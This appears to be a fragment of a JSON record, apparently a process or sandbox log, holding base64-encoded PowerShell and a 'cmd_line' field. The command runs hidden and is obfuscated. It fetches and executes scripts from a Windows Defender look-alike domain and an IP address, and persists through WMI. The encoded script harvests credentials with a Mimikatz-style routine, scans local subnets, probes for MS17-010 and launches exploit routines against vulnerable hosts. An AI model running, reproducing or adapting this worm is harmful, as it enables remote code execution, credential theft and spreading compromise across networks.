AHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0A